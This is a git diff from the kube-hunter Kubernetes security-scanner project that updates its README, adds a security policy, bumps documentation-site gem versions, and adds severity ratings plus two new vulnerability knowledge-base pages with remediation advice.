Aqua Security maintains a containerized version of kube-hunter at `aquasec/kube-hunter`. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com). Please note, that running the `aquasec/kube-hunter` container and uploading reports data are subject to additional [terms and conditions](https://kube-hunter.aquasec.com/eula.html).
|
||||
Aqua Security maintains a containerized version of kube-hunter at `aquasec/kube-hunter:aqua`. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com). Please note, that running the `aquasec/kube-hunter` container and uploading reports data are subject to additional [terms and conditions](https://kube-hunter.aquasec.com/eula.html).
|
||||
|
||||
The Dockerfile in this repository allows you to build a containerized version without the reporting plugin.
|
||||
|
||||
If you run the kube-hunter container with the host network, it will be able to probe all the interfaces on the host:
|
||||
If you run kube-hunter container with the host network, it will be able to probe all the interfaces on the host:
|
||||
|
||||
`docker run -it --rm --network host aquasec/kube-hunter`
|
||||
|
||||
@@ -156,5 +252,8 @@ The example `job.yaml` file defines a Job that will run kube-hunter in a pod, us
|
||||
* Find the pod name with `kubectl describe job kube-hunter`
|
||||
* View the test results with `kubectl logs <pod name>`
|
||||
|
||||
## Contribution
|
||||
To read the contribution guidelines, <a href="https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md"> Click here </a>
|
||||
|
||||
## License
|
||||
This repository is available under the [Apache License 2.0](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE).
|
||||
This repository is available under the [Apache License 2.0](https://github.com/aquasecurity/kube-hunter/blob/main/LICENSE).
|
||||
|
||||
17
SECURITY.md
Normal file
17
SECURITY.md
Normal file
@@ -0,0 +1,17 @@
|
||||
# Security Policy
|
||||
|
||||
## Supported Versions
|
||||
|
||||
| Version | Supported |
|
||||
| --------- | ------------------ |
|
||||
| 0.4.x | :white_check_mark: |
|
||||
| 0.3.x | :white_check_mark: |
|
||||
|
||||
## Reporting a Vulnerability
|
||||
We encourage you to find vulnerabilities in kube-hunter.
|
||||
The process is simple, just report a Bug issue. and we will take a look at this.
|
||||
If you prefer to disclose privately, you can write to one of the security maintainers at:
|
||||
|
||||
| Name | Email |
|
||||
| ----------- | ------------------ |
|
||||
| Daniel Sagi | daniel.sagi@aquasec.com |
|
||||
@@ -1,11 +1,12 @@
|
||||
GEM
|
||||
remote: https://rubygems.org/
|
||||
specs:
|
||||
activesupport (4.2.11.1)
|
||||
i18n (~> 0.7)
|
||||
activesupport (6.0.3.4)
|
||||
concurrent-ruby (~> 1.0, >= 1.0.2)
|
||||
i18n (>= 0.7, < 2)
|
||||
minitest (~> 5.1)
|
||||
thread_safe (~> 0.3, >= 0.3.4)
|
||||
tzinfo (~> 1.1)
|
||||
zeitwerk (~> 2.2, >= 2.2.2)
|
||||
addressable (2.7.0)
|
||||
public_suffix (>= 2.0.2, < 5.0)
|
||||
coffee-script (2.4.1)
|
||||
@@ -15,65 +16,67 @@ GEM
|
||||
colorator (1.1.0)
|
||||
commonmarker (0.17.13)
|
||||
ruby-enum (~> 0.5)
|
||||
concurrent-ruby (1.1.5)
|
||||
dnsruby (1.61.3)
|
||||
addressable (~> 2.5)
|
||||
em-websocket (0.5.1)
|
||||
concurrent-ruby (1.1.7)
|
||||
dnsruby (1.61.5)
|
||||
simpleidn (~> 0.1)
|
||||
em-websocket (0.5.2)
|
||||
eventmachine (>= 0.12.9)
|
||||
http_parser.rb (~> 0.6.0)
|
||||
ethon (0.12.0)
|
||||
ffi (>= 1.3.0)
|
||||
eventmachine (1.2.7)
|
||||
execjs (2.7.0)
|
||||
faraday (0.17.0)
|
||||
faraday (1.3.0)
|
||||
faraday-net_http (~> 1.0)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
ffi (1.11.1)
|
||||
ruby2_keywords
|
||||
faraday-net_http (1.0.1)
|
||||
ffi (1.14.2)
|
||||
forwardable-extended (2.6.0)
|
||||
gemoji (3.0.1)
|
||||
github-pages (201)
|
||||
activesupport (= 4.2.11.1)
|
||||
github-pages (209)
|
||||
github-pages-health-check (= 1.16.1)
|
||||
jekyll (= 3.8.5)
|
||||
jekyll-avatar (= 0.6.0)
|
||||
jekyll (= 3.9.0)
|
||||
jekyll-avatar (= 0.7.0)
|
||||
jekyll-coffeescript (= 1.1.1)
|
||||
jekyll-commonmark-ghpages (= 0.1.6)
|
||||
jekyll-default-layout (= 0.1.4)
|
||||
jekyll-feed (= 0.11.0)
|
||||
jekyll-feed (= 0.15.1)
|
||||
jekyll-gist (= 1.5.0)
|
||||
jekyll-github-metadata (= 2.12.1)
|
||||
jekyll-mentions (= 1.4.1)
|
||||
jekyll-optional-front-matter (= 0.3.0)
|
||||
jekyll-github-metadata (= 2.13.0)
|
||||
jekyll-mentions (= 1.6.0)
|
||||
jekyll-optional-front-matter (= 0.3.2)
|
||||
jekyll-paginate (= 1.1.0)
|
||||
jekyll-readme-index (= 0.2.0)
|
||||
jekyll-redirect-from (= 0.14.0)
|
||||
jekyll-relative-links (= 0.6.0)
|
||||
jekyll-remote-theme (= 0.4.0)
|
||||
jekyll-readme-index (= 0.3.0)
|
||||
jekyll-redirect-from (= 0.16.0)
|
||||
jekyll-relative-links (= 0.6.1)
|
||||
jekyll-remote-theme (= 0.4.2)
|
||||
jekyll-sass-converter (= 1.5.2)
|
||||
jekyll-seo-tag (= 2.5.0)
|
||||
jekyll-sitemap (= 1.2.0)
|
||||
jekyll-swiss (= 0.4.0)
|
||||
jekyll-seo-tag (= 2.6.1)
|
||||
jekyll-sitemap (= 1.4.0)
|
||||
jekyll-swiss (= 1.0.0)
|
||||
jekyll-theme-architect (= 0.1.1)
|
||||
jekyll-theme-cayman (= 0.1.1)
|
||||
jekyll-theme-dinky (= 0.1.1)
|
||||
jekyll-theme-hacker (= 0.1.1)
|
||||
jekyll-theme-hacker (= 0.1.2)
|
||||
jekyll-theme-leap-day (= 0.1.1)
|
||||
jekyll-theme-merlot (= 0.1.1)
|
||||
jekyll-theme-midnight (= 0.1.1)
|
||||
jekyll-theme-minimal (= 0.1.1)
|
||||
jekyll-theme-modernist (= 0.1.1)
|
||||
jekyll-theme-primer (= 0.5.3)
|
||||
jekyll-theme-primer (= 0.5.4)
|
||||
jekyll-theme-slate (= 0.1.1)
|
||||
jekyll-theme-tactile (= 0.1.1)
|
||||
jekyll-theme-time-machine (= 0.1.1)
|
||||
jekyll-titles-from-headings (= 0.5.1)
|
||||
jemoji (= 0.10.2)
|
||||
kramdown (= 1.17.0)
|
||||
liquid (= 4.0.0)
|
||||
listen (= 3.1.5)
|
||||
jekyll-titles-from-headings (= 0.5.3)
|
||||
jemoji (= 0.12.0)
|
||||
kramdown (= 2.3.0)
|
||||
kramdown-parser-gfm (= 1.1.0)
|
||||
liquid (= 4.0.3)
|
||||
mercenary (~> 0.3)
|
||||
minima (= 2.5.0)
|
||||
minima (= 2.5.1)
|
||||
nokogiri (>= 1.10.4, < 2.0)
|
||||
rouge (= 3.11.0)
|
||||
rouge (= 3.23.0)
|
||||
terminal-table (~> 1.4)
|
||||
github-pages-health-check (1.16.1)
|
||||
addressable (~> 2.3)
|
||||
@@ -81,27 +84,27 @@ GEM
|
||||
octokit (~> 4.0)
|
||||
public_suffix (~> 3.0)
|
||||
typhoeus (~> 1.3)
|
||||
html-pipeline (2.12.0)
|
||||
html-pipeline (2.14.0)
|
||||
activesupport (>= 2)
|
||||
nokogiri (>= 1.4)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
jekyll (3.8.5)
|
||||
jekyll (3.9.0)
|
||||
addressable (~> 2.4)
|
||||
colorator (~> 1.0)
|
||||
em-websocket (~> 0.5)
|
||||
i18n (~> 0.7)
|
||||
jekyll-sass-converter (~> 1.0)
|
||||
jekyll-watch (~> 2.0)
|
||||
kramdown (~> 1.14)
|
||||
kramdown (>= 1.17, < 3)
|
||||
liquid (~> 4.0)
|
||||
mercenary (~> 0.3.3)
|
||||
pathutil (~> 0.9)
|
||||
rouge (>= 1.7, < 4)
|
||||
safe_yaml (~> 1.0)
|
||||
jekyll-avatar (0.6.0)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-avatar (0.7.0)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
jekyll-coffeescript (1.1.1)
|
||||
coffee-script (~> 2.2)
|
||||
coffee-script-source (~> 1.11.1)
|
||||
@@ -114,36 +117,37 @@ GEM
|
||||
rouge (>= 2.0, < 4.0)
|
||||
jekyll-default-layout (0.1.4)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-feed (0.11.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-feed (0.15.1)
|
||||
jekyll (>= 3.7, < 5.0)
|
||||
jekyll-gist (1.5.0)
|
||||
octokit (~> 4.2)
|
||||
jekyll-github-metadata (2.12.1)
|
||||
jekyll (~> 3.4)
|
||||
jekyll-github-metadata (2.13.0)
|
||||
jekyll (>= 3.4, < 5.0)
|
||||
octokit (~> 4.0, != 4.4.0)
|
||||
jekyll-mentions (1.4.1)
|
||||
jekyll-mentions (1.6.0)
|
||||
html-pipeline (~> 2.3)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-optional-front-matter (0.3.0)
|
||||
jekyll (~> 3.0)
|
||||
jekyll (>= 3.7, < 5.0)
|
||||
jekyll-optional-front-matter (0.3.2)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
jekyll-paginate (1.1.0)
|
||||
jekyll-readme-index (0.2.0)
|
||||
jekyll (~> 3.0)
|
||||
jekyll-redirect-from (0.14.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-relative-links (0.6.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-remote-theme (0.4.0)
|
||||
jekyll-readme-index (0.3.0)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
jekyll-redirect-from (0.16.0)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-relative-links (0.6.1)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-remote-theme (0.4.2)
|
||||
addressable (~> 2.0)
|
||||
jekyll (~> 3.5)
|
||||
rubyzip (>= 1.2.1, < 3.0)
|
||||
jekyll (>= 3.5, < 5.0)
|
||||
jekyll-sass-converter (>= 1.0, <= 3.0.0, != 2.0.0)
|
||||
rubyzip (>= 1.3.0, < 3.0)
|
||||
jekyll-sass-converter (1.5.2)
|
||||
sass (~> 3.4)
|
||||
jekyll-seo-tag (2.5.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-sitemap (1.2.0)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-swiss (0.4.0)
|
||||
jekyll-seo-tag (2.6.1)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-sitemap (1.4.0)
|
||||
jekyll (>= 3.7, < 5.0)
|
||||
jekyll-swiss (1.0.0)
|
||||
jekyll-theme-architect (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
@@ -153,8 +157,8 @@ GEM
|
||||
jekyll-theme-dinky (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-hacker (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-theme-hacker (0.1.2)
|
||||
jekyll (> 3.5, < 5.0)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-leap-day (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
@@ -171,8 +175,8 @@ GEM
|
||||
jekyll-theme-modernist (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-primer (0.5.3)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-theme-primer (0.5.4)
|
||||
jekyll (> 3.5, < 5.0)
|
||||
jekyll-github-metadata (~> 2.9)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-theme-slate (0.1.1)
|
||||
@@ -184,43 +188,49 @@ GEM
|
||||
jekyll-theme-time-machine (0.1.1)
|
||||
jekyll (~> 3.5)
|
||||
jekyll-seo-tag (~> 2.0)
|
||||
jekyll-titles-from-headings (0.5.1)
|
||||
jekyll (~> 3.3)
|
||||
jekyll-titles-from-headings (0.5.3)
|
||||
jekyll (>= 3.3, < 5.0)
|
||||
jekyll-watch (2.2.1)
|
||||
listen (~> 3.0)
|
||||
jemoji (0.10.2)
|
||||
jemoji (0.12.0)
|
||||
gemoji (~> 3.0)
|
||||
html-pipeline (~> 2.2)
|
||||
jekyll (~> 3.0)
|
||||
kramdown (1.17.0)
|
||||
liquid (4.0.0)
|
||||
listen (3.1.5)
|
||||
rb-fsevent (~> 0.9, >= 0.9.4)
|
||||
rb-inotify (~> 0.9, >= 0.9.7)
|
||||
ruby_dep (~> 1.2)
|
||||
jekyll (>= 3.0, < 5.0)
|
||||
kramdown (2.3.0)
|
||||
rexml (>= 3.2.5)
|
||||
kramdown-parser-gfm (1.1.0)
|
||||
kramdown (>= 2.3.1)
|
||||
liquid (4.0.3)
|
||||
listen (3.4.0)
|
||||
rb-fsevent (~> 0.10, >= 0.10.3)
|
||||
rb-inotify (~> 0.9, >= 0.9.10)
|
||||
mercenary (0.3.6)
|
||||
mini_portile2 (2.4.0)
|
||||
minima (2.5.0)
|
||||
jekyll (~> 3.5)
|
||||
mini_portile2 (2.5.0)
|
||||
minima (2.5.1)
|
||||
jekyll (>= 3.5, < 5.0)
|
||||
jekyll-feed (~> 0.9)
|
||||
jekyll-seo-tag (~> 2.1)
|
||||
minitest (5.12.2)
|
||||
minitest (5.14.3)
|
||||
multipart-post (2.1.1)
|
||||
nokogiri (1.10.4)
|
||||
mini_portile2 (~> 2.4.0)
|
||||
octokit (4.14.0)
|
||||
nokogiri (>= 1.11.4)
|
||||
mini_portile2 (~> 2.5.0)
|
||||
racc (~> 1.4)
|
||||
octokit (4.20.0)
|
||||
faraday (>= 0.9)
|
||||
sawyer (~> 0.8.0, >= 0.5.3)
|
||||
pathutil (0.16.2)
|
||||
forwardable-extended (~> 2.6)
|
||||
public_suffix (3.1.1)
|
||||
rb-fsevent (0.10.3)
|
||||
rb-inotify (0.10.0)
|
||||
racc (1.5.2)
|
||||
rb-fsevent (0.10.4)
|
||||
rb-inotify (0.10.1)
|
||||
ffi (~> 1.0)
|
||||
rouge (3.11.0)
|
||||
ruby-enum (0.7.2)
|
||||
rexml (3.2.4)
|
||||
rouge (3.23.0)
|
||||
ruby-enum (0.8.0)
|
||||
i18n
|
||||
ruby_dep (1.5.0)
|
||||
rubyzip (2.0.0)
|
||||
ruby2_keywords (0.0.2)
|
||||
rubyzip (2.3.0)
|
||||
safe_yaml (1.0.5)
|
||||
sass (3.7.4)
|
||||
sass-listen (~> 4.0.0)
|
||||
@@ -230,14 +240,20 @@ GEM
|
||||
sawyer (0.8.2)
|
||||
addressable (>= 2.3.5)
|
||||
faraday (> 0.8, < 2.0)
|
||||
simpleidn (0.1.1)
|
||||
unf (~> 0.1.4)
|
||||
terminal-table (1.8.0)
|
||||
unicode-display_width (~> 1.1, >= 1.1.1)
|
||||
thread_safe (0.3.6)
|
||||
typhoeus (1.3.1)
|
||||
typhoeus (1.4.0)
|
||||
ethon (>= 0.9.0)
|
||||
tzinfo (1.2.5)
|
||||
tzinfo (1.2.9)
|
||||
thread_safe (~> 0.1)
|
||||
unicode-display_width (1.6.0)
|
||||
unf (0.1.4)
|
||||
unf_ext
|
||||
unf_ext (0.0.7.7)
|
||||
unicode-display_width (1.7.0)
|
||||
zeitwerk (2.4.2)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
@@ -247,4 +263,4 @@ DEPENDENCIES
|
||||
jekyll-sitemap
|
||||
|
||||
BUNDLED WITH
|
||||
1.17.2
|
||||
2.2.5
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
---
|
||||
title: kube-hunter
|
||||
description: Kube-hunter hunts for security weaknesses in Kubernetes clusters
|
||||
logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/master/kube-hunter.png
|
||||
logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/main/kube-hunter.png
|
||||
show_downloads: false
|
||||
google_analytics: UA-63272154-1
|
||||
theme: jekyll-theme-minimal
|
||||
@@ -10,7 +11,7 @@ collections:
|
||||
defaults:
|
||||
-
|
||||
scope:
|
||||
path: "" # an empty string here means all files in the project
|
||||
path: "" # an empty string here means all files in the project
|
||||
values:
|
||||
layout: "default"
|
||||
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV002
|
||||
title: Kubernetes version disclosure
|
||||
categories: [Information Disclosure]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV003
|
||||
title: Azure Metadata Exposure
|
||||
categories: [Information Disclosure]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
@@ -12,7 +13,10 @@ Microsoft Azure provides an internal HTTP endpoint that exposes information from
|
||||
|
||||
## Remediation
|
||||
|
||||
Consider using AAD Pod Identity. A Microsoft project that allows scoping the identity of workloads to Kubernetes Pods instead of VMs (instances).
|
||||
Starting in the 2020.10.15 Azure VHD Release, AKS restricts the pod CIDR access to that internal HTTP endpoint.
|
||||
|
||||
[CVE-2021-27075](https://github.com/Azure/AKS/issues/2168)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV004
|
||||
title: Azure SPN Exposure
|
||||
categories: [Identity Theft]
|
||||
severity: medium
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV005
|
||||
title: Access to Kubernetes API
|
||||
categories: [Information Disclosure, Unauthenticated Access]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
@@ -12,7 +13,7 @@ Kubernetes API was accessed with Pod Service Account or without Authentication (
|
||||
|
||||
## Remediation
|
||||
|
||||
Secure acess to your Kubernetes API.
|
||||
Secure access to your Kubernetes API.
|
||||
|
||||
It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.Spec`), and manage their permissions according to the least privilege principal.
|
||||
|
||||
@@ -21,4 +22,4 @@ Consider opting out automatic mounting of SA token using `automountServiceAccoun
|
||||
|
||||
## References
|
||||
|
||||
- [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
|
||||
- [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV006
|
||||
title: Insecure (HTTP) access to Kubernetes API
|
||||
categories: [Unauthenticated Access]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV007
|
||||
title: Specific Access to Kubernetes API
|
||||
categories: [Access Risk]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV020
|
||||
title: Possible Arp Spoof
|
||||
categories: [IdentityTheft]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV021
|
||||
title: Certificate Includes Email Address
|
||||
categories: [Information Disclosure]
|
||||
severity: low
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV022
|
||||
title: Critical Privilege Escalation CVE
|
||||
categories: [Privilege Escalation]
|
||||
severity: critical
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV023
|
||||
title: Denial of Service to Kubernetes API Server
|
||||
categories: [Denial Of Service]
|
||||
severity: medium
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV024
|
||||
title: Possible Ping Flood Attack
|
||||
categories: [Denial Of Service]
|
||||
severity: medium
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV025
|
||||
title: Possible Reset Flood Attack
|
||||
categories: [Denial Of Service]
|
||||
severity: medium
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV026
|
||||
title: Arbitrary Access To Cluster Scoped Resources
|
||||
categories: [PrivilegeEscalation]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV027
|
||||
title: Kubectl Vulnerable To CVE-2019-11246
|
||||
categories: [Remote Code Execution]
|
||||
severity: medium
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV028
|
||||
title: Kubectl Vulnerable To CVE-2019-1002101
|
||||
categories: [Remote Code Execution]
|
||||
severity: medium
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV029
|
||||
title: Dashboard Exposed
|
||||
categories: [Remote Code Execution]
|
||||
severity: critical
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
@@ -12,4 +13,5 @@ An open Kubernetes Dashboard was detected. The Kubernetes Dashboard can be used
|
||||
|
||||
## Remediation
|
||||
|
||||
Do not leave the Dashboard insecured.
|
||||
Do not leave the Dashboard insecured.
|
||||
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV030
|
||||
title: Possible DNS Spoof
|
||||
categories: [Identity Theft]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV031
|
||||
title: Etcd Remote Write Access Event
|
||||
categories: [Remote Code Execution]
|
||||
severity: critical
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV032
|
||||
title: Etcd Remote Read Access Event
|
||||
categories: [Access Risk]
|
||||
severity: critical
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV033
|
||||
title: Etcd Remote version disclosure
|
||||
categories: [Information Disclosure]
|
||||
severity: medium
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV034
|
||||
title: Etcd is accessible using insecure connection (HTTP)
|
||||
categories: [Unauthenticated Access]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV036
|
||||
title: Anonymous Authentication
|
||||
categories: [Remote Code Execution]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV037
|
||||
title: Exposed Container Logs
|
||||
categories: [Information Disclosure]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV038
|
||||
title: Exposed Running Pods
|
||||
categories: [Information Disclosure]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV039
|
||||
title: Exposed Exec On Container
|
||||
categories: [Remote Code Execution]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV040
|
||||
title: Exposed Run Inside Container
|
||||
categories: [Remote Code Execution]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV041
|
||||
title: Exposed Port Forward
|
||||
categories: [Remote Code Execution]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV042
|
||||
title: Exposed Attaching To Container
|
||||
categories: [Remote Code Execution]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV043
|
||||
title: Cluster Health Disclosure
|
||||
categories: [Information Disclosure]
|
||||
severity: low
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV044
|
||||
title: Privileged Container
|
||||
categories: [Access Risk]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV045
|
||||
title: Exposed System Logs
|
||||
categories: [Information Disclosure]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV046
|
||||
title: Exposed Kubelet Cmdline
|
||||
categories: [Information Disclosure]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV047
|
||||
title: Pod With Mount To /var/log
|
||||
categories: [Privilege Escalation]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV049
|
||||
title: kubectl proxy Exposed
|
||||
categories: [Information Disclosure]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
vid: KHV050
|
||||
title: Read access to Pod service account token
|
||||
categories: [Access Risk]
|
||||
severity: medium
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
41
docs/_kb/KHV051.md
Normal file
41
docs/_kb/KHV051.md
Normal file
@@ -0,0 +1,41 @@
|
||||
---
|
||||
vid: KHV051
|
||||
title: Exposed Existing Privileged Containers Via Secure Kubelet Port
|
||||
categories: [Access Risk]
|
||||
severity: high
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
## Issue description
|
||||
|
||||
The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTPs API. This may expose certain information and capabilities to an attacker with access to the kubelet API.
|
||||
|
||||
A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.
|
||||
|
||||
Furthermore, if the kubelet **and** the API server authentication mechanisms are (mis)configured such that anonymous requests can execute commands via the API within the containers (specifically privileged ones), a malicious actor can leverage such capabilities to do way more damage in the cluster than expected: e.g. start/modify process on host.
|
||||
|
||||
## Remediation
|
||||
|
||||
Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
|
||||
|
||||
Minimize the use of privileged containers.
|
||||
|
||||
Use Pod Security Policies to enforce using `privileged: false` policy.
|
||||
|
||||
Review the RBAC permissions to Kubernetes API server for the anonymous and default service account, including bindings.
|
||||
|
||||
Ensure node(s) runs active filesystem monitoring.
|
||||
|
||||
Set `--insecure-port=0` and remove `--insecure-bind-address=0.0.0.0` in the Kubernetes API server config.
|
||||
|
||||
Remove `AlwaysAllow` from `--authorization-mode` in the Kubernetes API server config. Alternatively, set `--anonymous-auth=false` in the Kubernetes API server config; this will depend on the API server version running.
|
||||
|
||||
## References
|
||||
|
||||
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
|
||||
- [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
|
||||
- [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)
|
||||
- [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
|
||||
- [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})
|
||||
- [KHV036 - Anonymous Authentication]({{ site.baseurl }}{% link _kb/KHV036.md %})
|
||||
24
docs/_kb/KHV052.md
Normal file
24
docs/_kb/KHV052.md
Normal file
@@ -0,0 +1,24 @@
|
||||
---
|
||||
vid: KHV052
|
||||
title: Exposed Pods
|
||||
categories: [Information Disclosure]
|
||||
severity: medium
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
## Issue description
|
||||
|
||||
An attacker could view sensitive information about pods that are bound to a Node using the exposed /pods endpoint
|
||||
This can be done either by accessing the readonly port (default 10255), or from the secure kubelet port (10250)
|
||||
|
||||
## Remediation
|
||||
|
||||
